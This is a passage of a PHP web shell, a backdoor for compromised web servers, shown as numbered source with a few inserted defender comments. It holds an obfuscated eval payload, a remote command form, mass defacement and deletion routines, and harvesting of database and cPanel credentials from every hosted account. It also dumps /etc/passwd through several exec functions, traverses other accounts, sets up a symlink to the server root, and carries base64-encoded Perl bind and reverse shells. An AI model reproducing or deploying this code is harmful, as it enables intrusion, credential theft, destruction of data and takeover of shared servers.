  588. $gwtamvan="nUl6Yts2EP68APkPNy6AHDSO7DhOSsdFm+VyLbBoTl5DFFJgQxJ6ZJFRhqRve3j++46ULMvNki4TIIA63stmz92Rgmq84HDNWccTpZGlGVTlccIUL6beDvS2Dzc33oabG4DPdSJHDjQ2XBQBAQI5M6lVAiKFNgSVfhhSKmdizArD7DpRo8KA5n+xYD981e0GX+CTQ4lHWXj4QyR5Du/5nzS+hWbF73+Gm6DbfTXyrUg48tHeYnxIrw3zSaaywsTiRwDZ3BiljCa4N8prZAuKcoHHcERrYBaS4TqnRuajxINHsVbgpcbIoe9UrCgWsaK5NKLYjVLuz3EX7QzG9FiZCZp1f6/XH/i9fX+2xL0rkRzfU2aM1DRr539cXmxJd7jJS7hX86g0os5l5EqbqOUvIXizYxLD5oYqU+HvzQ20UMqGhSgYSSAWmUNQ+Kn/5vXB2RmgJE/nWQ37ZQ5NcTxsvNfN2MQMbv/fNB42N2uBtbaR1n2vu0GEMQwtB4PjcLf3YGRKa8luqwLeGhPEMm4bb60XtKQFONuA2PJpXYaDnpwfgvue0Jx0i+GZbxifx7cUWcrgSnHEHE8Fs1NWwudtCBFvqPXOTiwSdcan2LmVmISAT55CTqs4IGhQpM4PxlINJRTXc6pRKZ92jQO/96Y2G3jkmY33D23jwU7PaQkBH2TIYqljM+EyCsgypXdTyB6BCY1kgcFSTsILaSwSrMEvC/j986X1ZcFvJ4kWY5QzpuB1NqNWMzLrVi+/qmW7biC2zwjc06zEj1nENFjtAFBOZhTIdk2P89NTCTU0opqNrcnSMImKvGveDis24fMmRfX1rFKpmbLa4yRNxSm1wuc7oajWaWBbhmWWJESEEJ8iqRnAOFDrgNhocCxzBbE1UGy/1yOgxAyXr9EbaT0F2z9daUry+4BgXtiaqUhq7RKQ3uH1xWKB1dHYcYjNsIhKB46iM1/yZ77/+fqjhbYE0Trw1rLUcpTzpk2l3HhFrnTADQSpzP1Ix6k89OqR3ap3DAF5je2ofvEqgWqzR2O1ee277/ZpSII1jVe0RarpYVSpJCsV7nM3wEZOZKmR9JTpQaONjHs324071y16YkHQOPP9lQqZyfHyfOITdVwiW+jRnm1DP+/yhb7LxkuogsWmRjOzs1dkp1ZxG4SChLNBcuLOh872El/LmXMZ+sLG60c8ft9jC8cpcB+xoja/Oo1dYxerJnpSB6+PTZWvu5KpUodcn58cXZ223VyeXoG1HrvrBgKPoL+aYmfswaf3pxen8OEET+gBdoOxhP1LB03jdwVg7wUA6hlrEYQHYJlzLSB7QgAZvABV4eh9CYrVsu6SWXXW+Zarclq+fnrYdpaDVLirH5bmyJGrf6TqPvDw9vPCyzKONdPuAqzH+gR/BWBr0pzzZf33iDyi7/9SnkOe4eWyuwsw7PynYNXy4R8=";error_reporting(0);@set_time_limit(0);eval(gzinflate(str_rot13(base64_decode($gwtamvan))));
  589.  
  590. } elseif($_GET['do'] == 'cmd') {
  591.     echo "<form method='post'>
  592.     <font style='text-decoration: underline;'>".$user."@".$ip.": ~ $ </font>
  593.     <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
  594.     </form>";
  595.     if($_POST['do_cmd']) {
  596.         echo "<pre>".exe($_POST['cmd'])."</pre>";
  597.     }
  598. } elseif($_GET['do'] == 'mass_deface') {
  599.     function sabun_massal($dir,$namafile,$isi_script) {
  600.         if(is_writable($dir)) {
  601.             $dira = scandir($dir);
  602.             foreach($dira as $dirb) {
  603.                 $dirc = "$dir/$dirb";
  604.                 $lokasi = $dirc.'/'.$namafile;
  605.                 if($dirb === '.') {
  606.                     file_put_contents($lokasi, $isi_script);
  607.                 } elseif($dirb === '..') {
  608.                     file_put_contents($lokasi, $isi_script);
  609.                 } else {
  610.                     if(is_dir($dirc)) {
  611.                         if(is_writable($dirc)) {
  612.                             echo "[<font color=green>DONE</font>] $lokasi<br>";
  613.                             file_put_contents($lokasi, $isi_script);
  614.                             $idx = sabun_massal($dirc,$namafile,$isi_script);
  615.                         }
  616.                     }
  617.                 }
  618.             }
  619.         }
  620.     }
  621.     function sabun_biasa($dir,$namafile,$isi_script) {
  622.         if(is_writable($dir)) {
  623.             $dira = scandir($dir);
  624.             foreach($dira as $dirb) {
  625.                 $dirc = "$dir/$dirb";
  626.                 $lokasi = $dirc.'/'.$namafile;
  627.                 if($dirb === '.') {
  628.                     file_put_contents($lokasi, $isi_script);
  629.                 } elseif($dirb === '..') {
  630.                     file_put_contents($lokasi, $isi_script);
  631.                 } else {
  632.                     if(is_dir($dirc)) {
  633.                         if(is_writable($dirc)) {
  634.                             echo "[<font color=green>DONE</font>] $dirb/$namafile<br>";
  635.                             file_put_contents($lokasi, $isi_script);
  636.                         }
  637.                     }
  638.                 }
  639.             }
  640.         }
  641.     }
  642.     if($_POST['start']) {
  643.         if($_POST['tipe_sabun'] == 'mahal') {
  644.             echo "<div style='margin: 5px auto; padding: 5px'>";
  645.             sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  646.             echo "</div>";
  647.         } elseif($_POST['tipe_sabun'] == 'murah') {
  648.             echo "<div style='margin: 5px auto; padding: 5px'>";
  649.             sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  650.             echo "</div>";
  651.         }
  652.     } else {
  653.     echo "<center>";
  654.     echo "<form method='post'>
  655.     <font style='text-decoration: underline;'>Type :</font><br>
  656.     <input type='radio' name='tipe_sabun' value='murah' checked>Normal<input type='radio' name='tipe_sabun' value='mahal'>Bulk<br>
  657.     <font style='text-decoration: underline;'>Folder:</font><br>
  658.     <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  659.     <font style='text-decoration: underline;'>Filename:</font><br>
  660.     <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
  661.     <font style='text-decoration: underline;'>Index File:</font><br>
  662.     <textarea name='script' style='width: 450px; height: 200px;'>Hacked by Ameer_Awwad & MHM</textarea><br>
  663.     <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  664.     </form></center>";
  665.     }
  666. } elseif($_GET['do'] == 'mass_delete') {
  667.     function hapus_massal($dir,$namafile) {
  668.         if(is_writable($dir)) {
  669.             $dira = scandir($dir);
  670.             foreach($dira as $dirb) {
  671.                 $dirc = "$dir/$dirb";
  672.                 $lokasi = $dirc.'/'.$namafile;
  673.                 if($dirb === '.') {
  674.                     if(file_exists("$dir/$namafile")) {
  675.                         unlink("$dir/$namafile");
  676.                     }
  677.                 } elseif($dirb === '..') {
  678.                     if(file_exists("".dirname($dir)."/$namafile")) {
  679.                         unlink("".dirname($dir)."/$namafile");
  680.                     }
  681.                 } else {
  682.                     if(is_dir($dirc)) {
  683.                         if(is_writable($dirc)) {
  684.                             if(file_exists($lokasi)) {
  685.                                 echo "[<font color=green>DELETED</font>] $lokasi<br>";
  686.                                 unlink($lokasi);
  687.                                 $idx = hapus_massal($dirc,$namafile);
  688.                             }
  689.                         }
  690.                     }
  691.                 }
  692.             }
  693.         }
  694.     }
  695.     if($_POST['start']) {
  696.         echo "<div style='margin: 5px auto; padding: 5px'>";
  697.         hapus_massal($_POST['d_dir'], $_POST['d_file']);
  698.         echo "</div>";
  699.     } else {
  700.     echo "<center>";
  701.     echo "<form method='post'>
  702.     <font style='text-decoration: underline;'>Folder:</font><br>
  703.     <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  704.     <font style='text-decoration: underline;'>Filename:</font><br>
  705.     <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
  706.     <input type='submit' name='start' value='Mass Delete' style='width: 450px;'>
  707.     </form></center>";
  708.     }
  709. } elseif($_GET['do'] == 'config') {
  710.     if($_POST){
  711.         $passwd = $_POST['passwd'];
  712.         mkdir("noname_config", 0777);
  713.         $isi_htc = "Options all\nRequire None\nSatisfy Any";
  714.         $htc = fopen("noname_config/.htaccess","w");
  715.         fwrite($htc, $isi_htc);
  716.         preg_match_all('/(.*?):x:/', $passwd, $user_config);
  717.         foreach($user_config[1] as $user_mys) {
  718.             $user_config_dir = "/home/$user_mys/public_html/";
  719.             if(is_readable($user_config_dir)) {
  720.                 $grab_config = array(
  721.                     "/home/$user_mys/.my.cnf" => "cpanel",
  722.                     "/home/$user_mys/.accesshash" => "WHM-accesshash",
  723.                     "/home/$user_mys/public_html/bw-configs/config.ini" => "BosWeb",
  724.                     "/home/$user_mys/public_html/config/koneksi.php" => "Lokomedia",
  725.                     "/home/$user_mys/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  726.                     "/home/$user_mys/public_html/clientarea/configuration.php" => "WHMCS",
  727.                     "/home/$user_mys/public_html/whm/configuration.php" => "WHMCS",
  728.                     "/home/$user_mys/public_html/whmcs/configuration.php" => "WHMCS",
  729.                     "/home/$user_mys/public_html/forum/config.php" => "phpBB",
  730.                     "/home/$user_mys/public_html/sites/default/settings.php" => "Drupal",
  731.                     "/home/$user_mys/public_html/config/settings.inc.php" => "PrestaShop",
  732.                     "/home/$user_mys/public_html/app/etc/local.xml" => "Magento",
  733.                     "/home/$user_mys/public_html/joomla/configuration.php" => "Joomla",
  734.                     "/home/$user_mys/public_html/configuration.php" => "Joomla",
  735.                     "/home/$user_mys/public_html/wp/wp-config.php" => "WordPress",
  736.                     "/home/$user_mys/public_html/wordpress/wp-config.php" => "WordPress",
  737.                     "/home/$user_mys/public_html/wp-config.php" => "WordPress",
  738.                     "/home/$user_mys/public_html/admin/config.php" => "OpenCart",
  739.                     "/home/$user_mys/public_html/slconfig.php" => "Sitelok",
  740.                     "/home/$user_mys/public_html/application/config/database.php" => "Ellislab",
  741.                     "/home1/$user_mys/.my.cnf" => "cpanel",
  742.                     "/home1/$user_mys/.accesshash" => "WHM-accesshash",
  743.                     "/home1/$user_mys/public_html/bw-configs/config.ini" => "BosWeb",
  744.                     "/home1/$user_mys/public_html/config/koneksi.php" => "Lokomedia",
  745.                     "/home1/$user_mys/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  746.                     "/home1/$user_mys/public_html/clientarea/configuration.php" => "WHMCS",
  747.                     "/home1/$user_mys/public_html/whm/configuration.php" => "WHMCS",
  748.                     "/home1/$user_mys/public_html/whmcs/configuration.php" => "WHMCS",
  749.                     "/home1/$user_mys/public_html/forum/config.php" => "phpBB",
  750.                     "/home1/$user_mys/public_html/sites/default/settings.php" => "Drupal",                      "/home1/$user_mys/public_html/config/settings.inc.php" => "PrestaShop",
  751.                     "/home1/$user_mys/public_html/app/etc/local.xml" => "Magento",
  752.                     "/home1/$user_mys/public_html/joomla/configuration.php" => "Joomla",
  753.                     "/home1/$user_mys/public_html/configuration.php" => "Joomla",
  754.                     "/home1/$user_mys/public_html/wp/wp-config.php" => "WordPress",
  755.                     "/home1/$user_mys/public_html/wordpress/wp-config.php" => "WordPress",
  756.                     "/home1/$user_mys/public_html/wp-config.php" => "WordPress",
  757.                     "/home1/$user_mys/public_html/admin/config.php" => "OpenCart",
  758.                     "/home1/$user_mys/public_html/slconfig.php" => "Sitelok",
  759.                     "/home1/$user_mys/public_html/application/config/database.php" => "Ellislab",
  760.                     "/home2/$user_mys/.my.cnf" => "cpanel",
  761.                     "/home2/$user_mys/.accesshash" => "WHM-accesshash",
  762.                     "/home2/$user_mys/public_html/bw-configs/config.ini" => "BosWeb",
  763.                     "/home2/$user_mys/public_html/config/koneksi.php" => "Lokomedia",
  764.                     "/home2/$user_mys/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  765.                     "/home2/$user_mys/public_html/clientarea/configuration.php" => "WHMCS",
  766.                     "/home2/$user_mys/public_html/whm/configuration.php" => "WHMCS",
  767.                     "/home2/$user_mys/public_html/whmcs/configuration.php" => "WHMCS",
  768.                     "/home2/$user_mys/public_html/forum/config.php" => "phpBB",
  769.                     "/home2/$user_mys/public_html/sites/default/settings.php" => "Drupal",
  770.                     "/home2/$user_mys/public_html/config/settings.inc.php" => "PrestaShop",
  771.                     "/home2/$user_mys/public_html/app/etc/local.xml" => "Magento",
  772.                     "/home2/$user_mys/public_html/joomla/configuration.php" => "Joomla",
  773.                     "/home2/$user_mys/public_html/configuration.php" => "Joomla",
  774.                     "/home2/$user_mys/public_html/wp/wp-config.php" => "WordPress",
  775.                     "/home2/$user_mys/public_html/wordpress/wp-config.php" => "WordPress",
  776.                     "/home2/$user_mys/public_html/wp-config.php" => "WordPress",
  777.                     "/home2/$user_mys/public_html/admin/config.php" => "OpenCart",
  778.                     "/home2/$user_mys/public_html/slconfig.php" => "Sitelok",
  779.                     "/home2/$user_mys/public_html/application/config/database.php" => "Ellislab",
  780.                     "/home3/$user_mys/.my.cnf" => "cpanel",
  781.                     "/home3/$user_mys/.accesshash" => "WHM-accesshash",
  782.                     "/home3/$user_mys/public_html/bw-configs/config.ini" => "BosWeb",
  783.                     "/home3/$user_mys/public_html/config/koneksi.php" => "Lokomedia",
  784.                     "/home3/$user_mys/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  785.                     "/home3/$user_mys/public_html/clientarea/configuration.php" => "WHMCS",
  786.                     "/home3/$user_mys/public_html/whm/configuration.php" => "WHMCS",
  787.                     "/home3/$user_mys/public_html/whmcs/configuration.php" => "WHMCS",
  788.                     "/home3/$user_mys/public_html/forum/config.php" => "phpBB",
  789.                     "/home3/$user_mys/public_html/sites/default/settings.php" => "Drupal",
  790.                     "/home3/$user_mys/public_html/config/settings.inc.php" => "PrestaShop",
  791.                     "/home3/$user_mys/public_html/app/etc/local.xml" => "Magento",
  792.                     "/home3/$user_mys/public_html/joomla/configuration.php" => "Joomla",
  793.                     "/home3/$user_mys/public_html/configuration.php" => "Joomla",
  794.                     "/home3/$user_mys/public_html/wp/wp-config.php" => "WordPress",
  795.                     "/home3/$user_mys/public_html/wordpress/wp-config.php" => "WordPress",
  796.                     "/home3/$user_mys/public_html/wp-config.php" => "WordPress",
  797.                     "/home3/$user_mys/public_html/admin/config.php" => "OpenCart",
  798.                     "/home3/$user_mys/public_html/slconfig.php" => "Sitelok",
  799.                     "/home3/$user_mys/public_html/application/config/database.php" => "Ellislab"
  800.                         ); 
  // Copy loop of the config-harvesting branch: every candidate path in
  // $grab_config is read and, when the result is non-empty, written to
  // noname_config/<account>-<label>.txt.
  // file_get_contents() returns false on failure and `== ''` treats that as
  // empty, so paths that are missing or unreadable are skipped without a trace.
  // Forensics: the output name is built from account and label only and is
  // opened with "w", while several candidate paths share one label; the file
  // left on disk is therefore the last non-empty match, not a full record of
  // what was read.
  // Response and hardening: treat database credentials, .my.cnf and .accesshash
  // content of every account that has a file in the drop directory as exposed,
  // and rotate them. The reads only succeed where the PHP process can read other
  // accounts' home directories; per-account PHP users, config files that are not
  // world-readable and open_basedir are the controls that close this off.
  801.                     foreach($grab_config as $config => $nama_config) {
  802.                         $ambil_config = file_get_contents($config);
  803.                         if($ambil_config == '') {
  804.                         } else {
  805.                             $file_config = fopen("noname_config/$user_mys-$nama_config.txt","w");
  806.                             fputs($file_config,$ambil_config);
  807.                         }
  808.                     }
  809.                 }      
  810.             }
  811.             echo "<center><a href='?dir=$dir/noname_config'><font color=lime>Done</font></a></center>";
  812.             }else{
  813.                
  814.         echo "<form method=\"post\" action=\"\"><center>etc/passw ( Error ? <a href='?dir=$dir&do=passwbypass'>Bypass Here</a> )<br><textarea name=\"passwd\" class='area' rows='15' cols='60'>\n";
  815.         echo file_get_contents('/etc/passwd');
  816.         echo "</textarea><br><input type=\"submit\" value=\"GassPoll\"></td></tr></center>\n";
  817.         }
  818. }elseif($_GET['do'] == 'passwbypass') {
  819.     echo '<center>Bypass etc/passw With:<br>
  820. <table style="width:50%">
  821.  <tr>
  822.    <td><form method="post"><input type="submit" value="System Function" name="syst"></form></td>
  823.    <td><form method="post"><input type="submit" value="Passthru Function" name="passth"></form></td>
  824.     <td><form method="post"><input type="submit" value="Exec Function" name="ex"></form></td>  
  825.     <td><form method="post"><input type="submit" value="Shell_exec Function" name="shex"></form></td>      
  826.    <td><form method="post"><input type="submit" value="Posix_getpwuid Function" name="melex"></form></td>
  827. </tr></table>Bypass User With : <table style="width:50%">
  828. <tr>
  829.    <td><form method="post"><input type="submit" value="Awk Program" name="awkuser"></form></td>
  830.    <td><form method="post"><input type="submit" value="System Function" name="systuser"></form></td>
  831.     <td><form method="post"><input type="submit" value="Passthru Function" name="passthuser"></form></td>  
  832.     <td><form method="post"><input type="submit" value="Exec Function" name="exuser"></form></td>      
  833.    <td><form method="post"><input type="submit" value="Shell_exec Function" name="shexuser"></form></td>
  834. </tr>
  835. </table><br>';
  836.  
  837.  
  // Handlers for the buttons rendered just above. Each one is selected by the
  // name of a POST field and runs a fixed command; no request data is
  // interpolated into the command strings.
  //   awkuser                              -> first field of /etc/passwd, sorted
  //   systuser/passthuser/exuser/shexuser  -> listing of /var/mail (presumably
  //                                           used because mailbox names mirror
  //                                           local account names)
  //   syst/passth/ex/shex                  -> contents of /etc/passwd
  // The same command is offered through system(), passthru(), exec() and
  // shell_exec(); the page labels this "Bypass", i.e. whichever function has
  // been left enabled is used.
  // Hardening: a disable_functions list only helps when it covers every
  // process-spawning function (these four plus popen and proc_open) and the
  // posix_getpwuid() lookup used further down; blocking a subset is no barrier.
  // Detection: the web-server or PHP-FPM user spawning `cat /etc/passwd`,
  // `ls /var/mail` or awk against /etc/passwd is a strong signal for
  // process-audit rules.
  838. if ($_POST['awkuser']) {
  839. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  840. echo shell_exec("awk -F: '{ print $1 }' /etc/passwd | sort");
  841. echo "</textarea><br>";
  842. }
  843. if ($_POST['systuser']) {
  844. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  845. echo system("ls /var/mail");
  846. echo "</textarea><br>";
  847. }
  848. if ($_POST['passthuser']) {
  849. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  850. echo passthru("ls /var/mail");
  851. echo "</textarea><br>";
  852. }
  853. if ($_POST['exuser']) {
  854. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  855. echo exec("ls /var/mail");
  856. echo "</textarea><br>";
  857. }
  858. if ($_POST['shexuser']) {
  859. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  860. echo shell_exec("ls /var/mail");
  861. echo "</textarea><br>";
  862. }
  863. if($_POST['syst'])
  864. {
  865. echo"<textarea class='inputz' cols='65' rows='15'>";
  866. echo system("cat /etc/passwd");
  867. echo"</textarea><br><br><b></b><br>";
  868. }
  869. if($_POST['passth'])
  870. {
  871. echo"<textarea class='inputz' cols='65' rows='15'>";
  872. echo passthru("cat /etc/passwd");
  873. echo"</textarea><br><br><b></b><br>";
  874. }
  875. if($_POST['ex'])
  876. {
  877. echo"<textarea class='inputz' cols='65' rows='15'>";
  878. echo exec("cat /etc/passwd");
  879. echo"</textarea><br><br><b></b><br>";
  880. }
  881. if($_POST['shex'])
  882. {
  883. echo"<textarea class='inputz' cols='65' rows='15'>";
  884. echo shell_exec("cat /etc/passwd");
  885. echo"</textarea><br><br><b></b><br>";
  886. }
  887. echo '<center>';
  888. if($_POST['melex'])
  889. {
  890. echo"<textarea class='inputz' cols='65' rows='15'>";
  891. for($uid=0;$uid<60000;$uid++){
  892. $ara = posix_getpwuid($uid);
  893. if (!empty($ara)) {
  894. while (list ($key, $val) = each($ara)){
  895. print "$val:";
  896. }
  897. print "\n";
  898. }
  899. }
  900. echo"</textarea><br><br>";
  901. }
  902. } elseif($_GET['do'] == 'jumping') {
  903.     $i = 0;
  904.     echo "<div class='margin: 5px auto;'>";
  905.     if(preg_match("/hsphere/", $dir)) {
  906.         $urls = explode("\r\n", $_POST['url']);
  907.         if(isset($_POST['jump'])) {
  908.             echo "<pre>";
  909.             foreach($urls as $url) {
  910.                 $url = str_replace(array("http://","www."), "", strtolower($url));
  911.                 $etc = "/etc/passwd";
  912.                 $f = fopen($etc,"r");
  913.                 while($gets = fgets($f)) {
  914.                     $pecah = explode(":", $gets);
  915.                     $user = $pecah[0];
  916.                     $dir_user = "/hsphere/local/home/$user";
  917.                     if(is_dir($dir_user) === true) {
  918.                         $url_user = $dir_user."/".$url;
  919.                         if(is_readable($url_user)) {
  920.                             $i++;
  921.                             $jrw = "[<font color=white>R</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
  922.                             if(is_writable($url_user)) {
  923.                                 $jrw = "[<font color=green>RW</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
  924.                             }
  925.                             echo $jrw."<br>";
  926.                         }
  927.                     }
  928.                 }
  929.             }
  930.         if($i == 0) {
  931.         } else {
  932.             echo "<br>Total there are ".$i." Bitches on ".$ip;
  933.         }
  934.         echo "</pre>";
  935.         } else {
  936.             echo '<center>
  937.                   <form method="post">
  938.                   Daftar Domains: <br>
  939.                   <textarea name="url" style="width: 500px; height: 250px;">';
  940.             $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
  941.             while($getss = fgets($fp)) {
  942.                 echo $getss;
  943.             }
  944.             echo  '</textarea><br>
  945.                   <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  946.                   </form></center>';
  947.         }
  948.     } elseif($_GET['do'] == 'backconnect') {
  949.     echo "<form method='post'>
  950.     <u>Bind Port:</u> <br>
  951.     PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
  952.     <input type='submit' name='sub_bp' value='>>'>
  953.     </form>
  954.     <form method='post'>
  955.     <u>Back Connect:</u> <br>
  956.     Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
  957.     PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
  958.     <input type='submit' name='sub_bc' value='>>'>
  959.     </form>";
  960.     $bind_port_p="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";
  961.     if(isset($_POST['sub_bp'])) {
  962.         $f_bp = fopen("/tmp/bp.pl", "w");
  963.         fwrite($f_bp, base64_decode($bind_port_p));
  964.         fclose($f_bp);
  965.  
  966.         $port = $_POST['port_bind'];
  967.         $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
  968.         sleep(1);
  969.         echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
  970.         unlink("/tmp/bp.pl");
  971.     }
  972.     $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
  973.     if(isset($_POST['sub_bc'])) {
  974.         $f_bc = fopen("/tmp/bc.pl", "w");
  975.         fwrite($f_bc, base64_decode($bind_connect_p));
  976.         fclose($f_bc);
  977.  
  978.         $ipbc = $_POST['ip_bc'];
  979.         $port = $_POST['port_bc'];
  980.         $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
  981.         sleep(1);
  982.         echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
  983.         unlink("/tmp/bc.pl");
  984.     }
  985. }elseif(preg_match("/vhosts|vhost/", $dir)) {
  986.         preg_match("/\/var\/www\/(.*?)\//", $dir, $vh);
  987.         $urls = explode("\r\n", $_POST['url']);
  988.         if(isset($_POST['jump'])) {
  989.             echo "<pre>";
  990.             foreach($urls as $url) {
  991.                 $url = str_replace("www.", "", $url);
  992.                 $web_vh = "/var/www/".$vh[1]."/$url/httpdocs";
  993.                 if(is_dir($web_vh) === true) {
  994.                     if(is_readable($web_vh)) {
  995.                         $i++;
  996.                         $jrw = "[<font color=white>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
  997.                         if(is_writable($web_vh)) {
  998.                             $jrw = "[<font color=white>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
  999.                         }
  1000.                         echo $jrw."<br>";
  1001.                     }
  1002.                 }
  1003.             }
  1004.         if($i == 0) {
  1005.         } else {
  1006.             echo "<br>Total there are ".$i." Room on ".$ip;
  1007.         }
  1008.         echo "</pre>";
  1009.         } else {
  1010.             echo '<center>
  1011.                   <form method="post">
  1012.                   List Domains: <br>
  1013.                   <textarea name="url" style="width: 500px; height: 250px;">';
  1014.                   bing("ip:$ip");
  1015.             echo  '</textarea><br>
  1016.                   <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  1017.                   </form></center>';
  1018.         }
  1019.     } else {
  1020.         echo "<pre>";
  1021.         $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
  1022.         while($passwd = fgets($etc)) {
  1023.             if($passwd == '' || !$etc) {
  1024.                 echo "<font color=red>Can't read /etc/passwd</font>";
  1025.             } else {
  1026.                 preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  1027.                 foreach($user_jumping[1] as $user_idx_jump) {
  1028.                     $user_jumping_dir = "/home/$user_idx_jump/public_html";
  1029.                     if(is_readable($user_jumping_dir)) {
  1030.                         $i++;
  1031.                         $jrw = "[<font color=white>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  1032.                         if(is_writable($user_jumping_dir)) {
  1033.                             $jrw = "[<font color=white>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  1034.                         }
  1035.                         echo $jrw;
  1036.                         if(function_exists('posix_getpwuid')) {
  1037.                             $domain_jump = file_get_contents("/etc/named.conf");   
  1038.                             if($domain_jump == '') {
  1039.                                 echo " => ( <font color=red>Yah...Failed to Take the Domain </font> )<br>";
  1040.                             } else {
  1041.                                 preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  1042.                                 foreach($domains_jump[1] as $dj) {
  1043.                                     $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  1044.                                     $user_jumping_url = $user_jumping_url['name'];
  1045.                                     if($user_jumping_url == $user_idx_jump) {
  1046.                                         echo " => ( <u>$dj</u> )<br>";
  1047.                                         break;
  1048.                                     }
  1049.                                 }
  1050.                             }
  1051.                         } else {
  1052.                             echo "<br>";
  1053.                         }
  1054.                     }
  1055.                 }
  1056.             }
  1057.         }
  1058.         if($i == 0) {
  1059.         } else {
  1060.             echo "<br>Total ada ".$i." Lonte di ".$ip;
  1061.         }
  1062.         echo "</pre>";
  1063.     }
  1064.     echo "</div>";
  1065. } elseif($_GET['do'] == 'symlink') {
  1066. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  1067. $d0mains = @file("/etc/named.conf");
  1068. ##httaces
  1069. if($d0mains){
  // Set-up of the symlink branch: creates a directory "Rlx_Symlink" (mode 0777),
  // changes into it, asks exe() to create a link named "root" that points at "/",
  // and writes an .htaccess next to it.
  // exe() is defined elsewhere in the file and is not visible here; presumably
  // it runs a shell command.
  // The .htaccess turns on Indexes and FollowSymLinks and maps .php to
  // text/plain, so PHP files reached through the link would be returned as
  // source text instead of being executed.
  // Every call is prefixed with @ or unchecked, so failures are silent.
  // Defender notes:
  //  - Indicator: a "Rlx_Symlink" directory under a document root containing a
  //    symlink that resolves to "/" together with this .htaccess. Sweeping
  //    docroots for symlinks that resolve outside the owning account's home
  //    finds this class of artifact regardless of the directory name.
  //  - Mitigation: set `Options -FollowSymLinks +SymLinksIfOwnerMatch` at server
  //    level and use an AllowOverride value that does not grant Options or
  //    FileInfo, so a dropped .htaccess cannot re-enable link following or
  //    remap the .php handler.
  1070. @mkdir("Rlx_Symlink",0777);
  1071. @chdir("Rlx_Symlink");
  1072. @exe("ln -s / root");
  1073. $file3 = 'Options Indexes FollowSymLinks
  1074. DirectoryIndex 0xaN0n.htm
  1075. AddType text/plain .php
  1076. AddHandler text/plain .php
  1077. Satisfy Any';
  1078. $fp3 = fopen('.htaccess','w');
  1079. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  1080. echo "
  1081. <table align=center border=1 style='width:60%;border-color:#33FF00;'>
  1082. <tr>
  1083. <td align=center><font size=2>S. No.</font></td>
  1084. <td align=center><font size=2>Domains</font></td>
  1085. <td align=center><font size=2>Users</font></td>
  1086. <td align=center><font size=2>Symlink</font></td>
  1087. </tr>";
  1088. $dcount = 1;
  1089. foreach($d0mains as $d0main){
  1090. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
  1091. flush();
  1092. if(strlen(trim($domains[1][0])) > 2){
  1093. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  1094. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
  1095. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
  1096. <td>".$user['name']."</td>
  1097. <td><a href='$full/Rlx_Symlink/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
  1098. flush();
  1099. $dcount++;}}}
  1100. echo "</table>";
  1101. }else{
  1102. $TEST=@file('/etc/passwd');
  1103. if ($TEST){
  1104. @mkdir("Rlx_Symlink",0777);
